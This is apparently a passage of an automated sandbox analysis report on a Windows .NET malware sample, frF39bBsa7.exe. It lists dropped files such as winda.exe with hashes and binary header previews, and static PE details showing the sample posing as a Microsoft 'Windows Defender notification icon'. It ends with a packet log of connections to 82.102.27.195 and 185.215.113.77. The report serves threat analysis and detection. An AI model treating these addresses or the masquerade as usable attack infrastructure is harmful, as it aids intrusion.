                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0f4eb5b1d0857aabc3e7dd079735875\System.Management.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..
                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\frF39bBsa7.exe.log
                                                    Process:C:\Users\user\Desktop\frF39bBsa7.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):425
                                                    Entropy (8bit):5.351599573976469
                                                    Encrypted:false
                                                    SSDEEP:12:Q3La/KDLI4MWuPTxAIOKbbDLI4MWuPOKN08JOKhav:ML9E4KrgKDE4KGKN08AKhk
                                                    MD5:BEBB66F4CB83D5C34857FE75DE3A8610
                                                    SHA1:66FB475AADAE0D4542125C8E272D9D6BBFA555BB
                                                    SHA-256:C1A8084313E66497C9F53D0F65E85AC2D4A840AF7FEBCCCFB3924F54BCF1BADC
                                                    SHA-512:45181B8B60B7F0FD0D841F50592B9E83F7BADF1FFED040DFCAF5779BF5F653633D78B28E5AFA92A53E9DA965113E4A8E7A16456AE3A8FDF786B7DF6B3FEE5CE8
                                                    Malicious:true
                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..
                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\winda.exe.log
                                                    Process:C:\Users\user\AppData\Roaming\winda.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):425
                                                    Entropy (8bit):5.351599573976469
                                                    Encrypted:false
                                                    SSDEEP:12:Q3La/KDLI4MWuPTxAIOKbbDLI4MWuPOKN08JOKhav:ML9E4KrgKDE4KGKN08AKhk
                                                    MD5:BEBB66F4CB83D5C34857FE75DE3A8610
                                                    SHA1:66FB475AADAE0D4542125C8E272D9D6BBFA555BB
                                                    SHA-256:C1A8084313E66497C9F53D0F65E85AC2D4A840AF7FEBCCCFB3924F54BCF1BADC
                                                    SHA-512:45181B8B60B7F0FD0D841F50592B9E83F7BADF1FFED040DFCAF5779BF5F653633D78B28E5AFA92A53E9DA965113E4A8E7A16456AE3A8FDF786B7DF6B3FEE5CE8
                                                    Malicious:false
                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..
                                                    C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe
                                                    Process:C:\Users\user\Desktop\frF39bBsa7.exe
                                                    File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):54888
                                                    Entropy (8bit):6.125126981928183
                                                    Encrypted:false
                                                    SSDEEP:768:iF9E8FLSs2Zokf85dIV4Tg6Iq88nqf7PZv7gfVi/OL:ifE6hkfOdIuT/9u7oV5
                                                    MD5:7809A19AA8DA1A41F36B60B0664C4E20
                                                    SHA1:377D8861636FD5BA005B6073C5C9ADE319861C2E
                                                    SHA-256:7A2C15CE0E8593A1645C4E4F17873D953A2FFBD10AC048F8E0AA5B616381BF6D
                                                    SHA-512:9CD399E264895027141C229248F1F3E2E08D001E9B2A07F3C9C6DD0F1662AFB0446FE0C009C881AA886571075EA782FE6E6A7E14F905BC47769AA01D86356D58
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Joe Sandbox View:
                                                    • Filename: mUlwg5WgCk.exe, Detection: malicious, Browse
                                                    • Filename: DwssKedtup.exe, Detection: malicious, Browse
                                                    • Filename: zXiNjPgUyU.exe, Detection: malicious, Browse
                                                    • Filename: hK3SLEhK33.exe, Detection: malicious, Browse
                                                    • Filename: vygz5Sujr9.exe, Detection: malicious, Browse
                                                    • Filename: CvKf4aWL2U.exe, Detection: malicious, Browse
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...jZ.Z.........."...0.................. .....@..... ...................................`...@......@............... ..................................................h>..........4................................................................ ..H............text...l.... ...................... ..`.rsrc...............................@..@........................................H.......l3..pc.............X...4........................................0..........s.....Y.....(.....Z.....&..(......+....(....o......r...p(....-..r...p(....,.....X....i2..-;(....(..........%.r!..p.(....(....((...(....(....(....( .....-.(7...(.....*.(....-..*.~S...-.~R....S...s!.....~W...o"....~U...o#....~V...o$....o%...~Y...o&...~S...~Q...~T....s'....P...~P...sE...o(............~W....@_,s.....()...r7..p.$(*........o+..........o,....2....... ....37(....(8.........%...o-....(......o
                                                    C:\Users\user\AppData\Roaming\winda.exe
                                                    Process:C:\Users\user\Desktop\frF39bBsa7.exe
                                                    File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1271296
                                                    Entropy (8bit):7.994312109102028
                                                    Encrypted:true
                                                    SSDEEP:24576:8JIAmP4P4PmhPXkuRK04wly2uFUGLEWa1k8RWwM:mzmP4PwOP8olNLEra
                                                    MD5:F6A627B01B8AC665ADD87B047E732613
                                                    SHA1:B50D28F58D0892708DB4CA09658547FBA013F73D
                                                    SHA-256:BBABC0CB29DC697735AB4B2D4285E9BB608F992393B734B7B20D4A4BA42A75CE
                                                    SHA-512:A196B0C1B5FA0BC8DBB2FD49F8E1FCA4144240E38F876E73E9380B709E5DD4F5D2C3DF585870D288699776ADD48A85FA8845E6EFF5DE76DEB6B6F6B96F09C9AA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    Joe Sandbox View:
                                                    • Filename: 85OZry2mNl.exe, Detection: malicious, Browse
                                                    • Filename: mUlwg5WgCk.exe, Detection: malicious, Browse
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....,...............0..>...&........... ....@...... ....................................@...@......@............... ...............................`...$........................................................................................... ..H............text....=... ...>.................. ..`.rsrc....$...`...&...@..............@..@........................................H........8.../...........h...............................................0..:....... .......8.....(.......;......X...?....(............&.....*..........33.......0..........(....o......8....*.8C...80......r...p .......o....&8.........&8.........8......(......8......(....:....8................o....8.....8................=..........^q.......0..U.......r...prS..prW..p(....(....rY..p ............%.(!...(.....o....t.....s....%.o....o....*...&~.......*...~....*..0..........(....rc..po.....
                                                    C:\Users\user\AppData\Roaming\winda.exe:Zone.Identifier
                                                    Process:C:\Users\user\Desktop\frF39bBsa7.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview: [ZoneTransfer]....ZoneId=0

                                                    Static File Info

                                                    General

                                                    File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.994312109102028
                                                    TrID:
                                                    • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                    • Win64 Executable GUI (202006/5) 46.43%
                                                    • Win64 Executable (generic) (12005/4) 2.76%
                                                    • Generic Win/DOS Executable (2004/3) 0.46%
                                                    • DOS Executable Generic (2002/1) 0.46%
                                                    File name:frF39bBsa7.exe
                                                    File size:1271296
                                                    MD5:f6a627b01b8ac665add87b047e732613
                                                    SHA1:b50d28f58d0892708db4ca09658547fba013f73d
                                                    SHA256:bbabc0cb29dc697735ab4b2d4285e9bb608f992393b734b7b20d4a4ba42a75ce
                                                    SHA512:a196b0c1b5fa0bc8dbb2fd49f8e1fca4144240e38f876e73e9380b709e5dd4f5d2c3df585870d288699776add48a85fa8845e6eff5de76deb6b6f6b96f09c9aa
                                                    SSDEEP:24576:8JIAmP4P4PmhPXkuRK04wly2uFUGLEWa1k8RWwM:mzmP4PwOP8olNLEra
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....,...............0..>...&........... ....@...... ....................................@...@......@............... .....

                                                    File Icon

                                                    Icon Hash:69e88ccccce86992

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x400000
                                                    Entrypoint Section:
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0xCC2CB512 [Tue Jul 19 18:46:42 2078 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:

                                                    Entrypoint Preview

                                                    Instruction
                                                    dec ebp
                                                    pop edx
                                                    nop
                                                    add byte ptr [ebx], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax+eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1360000x241c.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000x133d800x133e00False0.990687170118data7.99833264262IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc0x1360000x241c0x2600False0.124074835526data3.02869781064IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountry
                                                    RT_ICON0x1361300x1ca8data
                                                    RT_GROUP_ICON0x137dd80x14data
                                                    RT_VERSION0x137dec0x444data
                                                    RT_MANIFEST0x1382300x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                    Version Infos

                                                    DescriptionData
                                                    Translation0x0000 0x04b0
                                                    LegalCopyright Microsoft Corporation. All rights reserved.
                                                    Assembly Version4.10.14393.1198
                                                    InternalNamepm.exe
                                                    FileVersion4.10.14393.1198
                                                    CompanyNameMicrosoft Corporation
                                                    LegalTrademarks
                                                    CommentsWindows Defender notification icon
                                                    ProductNameMicrosoft Windows Operating System
                                                    ProductVersion4.10.14393.1198
                                                    FileDescriptionWindows Defender notification icon
                                                    OriginalFilenamepm.exe

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 8, 2021 14:28:28.261936903 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:28:28.328551054 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:28.328675032 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:28:31.593487978 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:28:31.706777096 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.706840992 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:28:31.775633097 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.775762081 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.775895119 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.775896072 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:28:31.775918007 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.775939941 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.775969982 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.775974989 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:28:31.776047945 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:28:31.776072979 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.776093960 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.776232004 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.776299953 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.776334047 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:28:31.776355028 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:28:31.842534065 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.842575073 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.842600107 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.842636108 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.842653990 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.842730999 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:28:31.842765093 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:28:31.842777014 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.842897892 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:28:31.843060970 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.843089104 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.843136072 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.843159914 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:28:31.843163013 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.843187094 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.843204021 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.843223095 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.843244076 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:28:31.843246937 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.843266964 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.843291044 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.843308926 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:31.843324900 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:28:31.843341112 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:28:31.889492989 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:28:59.614356995 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:28:59.725111961 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:28:59.725399017 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:28:59.841375113 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:29:10.270452023 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:29:10.314588070 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:29:10.380691051 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:29:10.423990011 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:29:10.621386051 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:29:10.742328882 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:29:10.742440939 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:29:10.810432911 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:29:10.861571074 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:29:10.928564072 CEST460174982582.102.27.195192.168.2.3
                                                    Oct 8, 2021 14:29:10.970930099 CEST4982546017192.168.2.382.102.27.195
                                                    Oct 8, 2021 14:29:11.149609089 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.212332010 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.212593079 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.215204000 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.276575089 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.277029037 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.277100086 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.277147055 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.277164936 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.277185917 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.277225971 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.277265072 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.277302980 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.277339935 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.277368069 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.277373075 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.277378082 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.277426004 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.277477026 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.277479887 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.338648081 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.338692904 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.338721991 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.338745117 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.338764906 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.338790894 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.338813066 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.338836908 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.338864088 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.338890076 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.338973999 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.339000940 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.339005947 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.400244951 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.400290966 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.400307894 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.400324106 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.400346041 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.400367975 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.400387049 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.400413990 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.400437117 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.400459051 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.400597095 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.400655985 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.463696003 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.463776112 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.463802099 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.463819981 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.463850975 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.463875055 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.463895082 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.463916063 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.463936090 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.463958025 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.464062929 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.464113951 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.526185036 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.526278973 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.526319981 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.526352882 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.526391029 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.526426077 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.526458025 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.526493073 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.526494026 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.526518106 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.526521921 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.526527882 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.526539087 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.526568890 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.526602983 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.526788950 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.580454111 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.587830067 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.587865114 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.587887049 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.587904930 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.587929964 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.587954044 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.587977886 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.588001966 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.588037014 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.588059902 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.588119030 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.588151932 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.650437117 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.650464058 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.650556087 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.650573015 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.650623083 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.650640965 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.650711060 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.650738001 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.650755882 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.650774002 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.650778055 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.650780916 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.650800943 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.650820017 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.650840998 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.650846004 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.650851965 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.651154041 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.712203979 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.712239027 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.712263107 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.712285995 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.712308884 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.712331057 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.712352037 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.712369919 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.712388992 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.712409973 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.712428093 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.712435961 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.712460995 CEST8049832185.215.113.77192.168.2.3
                                                    Oct 8, 2021 14:29:11.712462902 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.712477922 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.712481022 CEST4983280192.168.2.3185.215.113.77
                                                    Oct 8, 2021 14:29:11.714118004 CEST4983280192.168.2.3185.215.113.77
